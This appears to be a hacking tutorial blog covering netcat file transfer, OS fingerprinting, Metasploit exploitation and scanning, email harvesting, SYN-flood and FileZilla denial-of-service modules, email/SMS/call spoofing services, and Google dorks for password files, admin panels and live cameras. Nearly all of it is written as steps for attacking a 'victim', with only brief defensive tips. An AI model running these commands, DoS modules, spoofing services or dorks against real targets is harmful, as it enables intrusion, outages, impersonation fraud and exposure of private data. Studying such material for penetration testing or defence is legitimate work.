Misguide the attacker by displaying false daemon banners.
Use a long false daemon banner and in the background record information about the attacking client and try to trace him/her.
NetCat
Netcat is one of the most popular and widely used networking utilities on the internet. It can be used to read and write network connections. It is widely used by both criminals and system administrators.
Netcat is used for:
- Listening on a port
- Connecting to a port
- File transfer
- Chatting
- Executing applications
- Sending spoofed HTTP probes
- Proxy servers
- Port scanning, etc.
It is also used to probe a remote computer for open ports and the daemon/software running on the open ports.
Netcat commands (command line tool):
nc -v www.altoromutual.com 80
GET / HTTP/1.0
Ncat is an improved, better version, which comes free with Nmap.
ncat -C www.altoromutual.com 80
GET / HTTP/1.0
ncat -l 127.0.0.1 8080
opens a port on the local machine. Open a browser and type 127.0.0.1:8080/. Nothing happens in the browser; in the command prompt, ncat has recorded some information about the browser. This technique can be used to trace attackers.
Transferring files using ncat:
ncat -l 7000 > output.txt
(opens port 7000 and accepts input on it, which will be saved in output.txt)
ncat 127.0.0.1 7000 < input.txt
Operating System (OS) detection
It is important for an attacker to determine what OS is running on the target system. The 2 most effective techniques are:
Active fingerprinting
Passive fingerprinting
Different OSes have different stacks. Hence, different OSes respond differently to the same packet sent to them by the same system. This difference in response is used as a benchmark for differentiating between various operating systems.
Active fingerprinting is the process of actively sending data packets to the target system to generate a response, which is then analyzed and compared to the list of known responses to determine the OS running on the target system. Typically, while analyzing responses, the following fields and techniques can be useful:
TCP initial window size of packets
TTL values
ACK values of packets
Initial Sequence Number (ISN) values
Handling of overlapped fragments, etc.
The attacker can be traced. That means this method is not anonymous.
Nmap commands:
nmap -O -v www.altoromutual.com
nmap -A -v www.altoromutual.com
Passive fingerprinting
The problem with active fingerprinting is that it reveals the identity of the criminal.
http://lcamtuf.coredump.cx/p0f3/
p0f will try to determine the OS information by simply analyzing the data packets sent by the target system while performing usual and routine communication, e.g. if the target visits your website, sends you a file, etc.
p0f -L
p0f -i 4 (interface number)
The TTL, window size, DF bit and TOS fields in the reply TCP packet are analyzed to get the remote OS.
OS Detection Countermeasures
Change the default values of your OS like TTL, ISN, etc.
Mislead attacker by configuring default values of some other OS on your system.
Use ACLs to filter out unwanted probing packets.
Security Auditing
It is a technique of scanning the victim computer for any potential security loopholes
that may exist on it, using which an attacker can hack into it.
Tools: Nessus, GFI LANguard, Retina Scan, SAINT, Core Impact, NSAuditor (not free)
Attacking the target computer using METASPLOIT
In my previous blog, I have covered detailed step-by-step instructions on how to collect maximum information about the victim in pursuit of any possible weak entry points. These are popularly called vulnerabilities. Once you get any possible loopholes or vulnerabilities, it is the perfect time to ATTACK!!!
Metasploit is an open source framework for penetration testing that allows you to test the security of a network. It has a built-in database of hundreds of known loopholes and vulnerabilities for various platforms and software. It allows you to automatically test a remote system for all these hundreds of security loopholes.
EXPLOIT: code, software or a tool that misuses a vulnerability or loophole on a remote machine to cause malicious results on it.
PAYLOAD: the effect of executing the exploit code and some other payload code on a remote machine, which allows a medium of communication to be established between the attacker and the victim. It could be in the form of modification/deletion of data, getting shell access, file access and others.
Each EXPLOIT will support certain types of PAYLOADS.
STEPS INVOLVED
1. Identify loophole on victim using network reconnaissance, security auditing and
penetration testing.
2. Select and configure that exploit and various exploit options on metasploit.
3. Select victim computer and victim port.
4. Select payload you wish to launch with exploit code.
5. Launch the attack.
Metasploit Commands:
>help
>banner
>connect www.altoromutual.com 80
GET / HTTP/1.0
>ping www.altoromutual.com
>show exploits
>show payloads
>show auxiliary
>search type:exploit platform:windows unsafe
>info windows/tftp/quick_tftp_pro_mode
>use windows/tftp/quick_tftp_pro_mode
windows/tftp/quick_tftp_pro_mode>show options
windows/tftp/quick_tftp_pro_mode>set RHOST altoromutual.com
windows/tftp/quick_tftp_pro_mode>check
windows/tftp/quick_tftp_pro_mode>exploit
windows/tftp/quick_tftp_pro_mode>back (exit a module)
Port scanning using Metasploit
It is possible to port scan a remote computer using Metasploit. All nmap commands are valid in Metasploit.
>search portscan
>use auxiliary/scanner/portscan/tcp
>use auxiliary/scanner/portscan/syn (SYN port scan)
>use auxiliary/scanner/portscan/xmas (XMAS port scan)
>use auxiliary/scanner/portscan/ack (ACK port scan)
>show options
>set RHOSTS www.victim.com
>set PORTS 1-100
>set VERBOSE true
>run
>nmap -sT -p 1-100 -Pn www.victim.com
Daemon banner grabbing using Metasploit
>use auxiliary/scanner/pop3/pop3_version
>set RHOSTS www.victim.com
>run
Similarly,
>use auxiliary/scanner/http/http_version
>set RHOSTS www.victim.com
>run
>use auxiliary/scanner/smtp/smtp_version
>set RHOSTS www.victim.com
>run
(SMTP runs on port 25, port 80 is HTTP and port 110 is POP3)
Grabbing email addresses from a website
>search collector
>use auxiliary/gather/search_email_collector
>show options
>set DOMAIN www.victim.com
>run
TCP flooding using Metasploit
It is possible to execute a DoS attack against various victims using Metasploit.
>use auxiliary/dos/tcp/synflood
>set RHOST www.victim.com
>run
FileZilla is a popular FTP server for the Windows platform. There are 2 modules in Metasploit that can be used to execute a DoS attack against some versions of the FileZilla server:
>use auxiliary/dos/windows/ftp/filezilla_admin_user
>set RHOST www.victim.com
>run
>use auxiliary/dos/windows/ftp/filezilla_server_port
>set RHOST www.victim.com
>run
Disposable email (anonymous): www.hidemyass.com
Email spoofing: the art of sending a spoofed email from somebody else's email account.
www.anonymizer.in/fake-mailer
SMS spoofing (paid service, but may be worth it):
http://www.spranked.com/
http://www.phonytext.com/
Call spoofing: http://www.mobivox.com
Google dorks
Google hacking or Google dorking is the use of clever Google search tags or commands to try and reveal sensitive data about victims, like password files, vulnerable servers and others. A Google dork, in hacker slang, is somebody whose sensitive data is revealed with the use of Google hacking or Google dorking.
Examples:
info:<web address>
cache:www.facebook.com password (retrieve old cached copy of webpage)
link:www.flyingmachine.co.in
allintitle:Login
allintitle:Login+site:timesofindia.com
allinurl:password login
allinurl:password login+site:www.google.com
inurl:/view.index.shtml (access live cameras)
inurl:/view.indexFrame.shtml Axis
ext:pdf hacking
site:gov inurl:admin login
site:in inurl:admin login
intitle:intranet inurl:intranet+site:in
"Welcome to phpMyAdmin" AND "Create new database"
"index of /etc/passwd"
Google Hacking Database (GHDB)
http://www.hackersforcharity.org/ghdb/
Website Mirroring